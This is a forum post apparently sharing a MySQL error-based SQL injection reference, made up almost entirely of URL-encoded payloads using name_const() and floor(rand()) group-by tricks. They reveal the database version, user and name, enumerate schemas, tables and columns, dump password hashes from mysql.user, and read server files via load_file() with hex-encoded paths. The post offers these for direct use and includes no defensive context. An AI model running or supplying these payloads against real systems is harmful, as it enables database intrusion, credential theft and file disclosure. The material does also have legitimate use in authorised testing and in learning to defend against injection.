MySQL error-based injection reference (pdf)

Posted 2013-7-27 11:00:46
Last edited by Nightmare on 2013-3-17 14:20
MySQL error-based injection reference (pdf), one post a day...
MySql Error Based Injection Reference
[MySQL error-based injection reference]
Author: pnig0s1992
Blog: http://pnig0s1992.blog.51cto.com/
Team: http://www.FreeBuf.com/
Tested on MySQL 5.0.91; succeeds on the great majority of 5.x versions.
A small number of versions raise an error on name_const() itself; on those, use the Method.2 payload given below. In the payloads that follow, + is a URL-encoded space and the 0x... values are hex literals for strings (so no quote characters are needed).
Query the version:
Method.1: and+exists(select*from+(select*from(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c)
Method.2: and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+group+by+a)b)
Query the current user:
Method.1: and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
Method.2: and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Query the current database:
Method.1: and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
Method.2: and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Enumerate databases one at a time:
and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c)
Step n through 0, 1, 2, ... in turn.
Count the tables in a given database:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+table_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
0x6D7973716C = mysql
Enumerate tables one at a time:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+table_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
0x6D7973716C = mysql; step n through 0, 1, 2, ... in turn.
Count the columns in a table:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
0x6D7973716C = mysql, 0x636F6C756D6E735F70726976 = columns_priv
Enumerate columns one at a time:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Step n through 0, 1, 2, ... in turn.
Dump row contents one at a time:
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Step n through 0, 1, 2, ... in turn.
Dump file contents:
and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a+from+information_schema.tables+group+by+a)b)
0x433A5C5C746573742E617361 = C:\\test.asa (likewise 0x433A5C5C626F6F742E696E69 = C:\\boot.ini). The error only echoes 64 bytes of the value, so use substring() to choose which bytes are displayed and page through the file; the path goes in as a hex literal.
Thx for reading.
You can skip the download as well,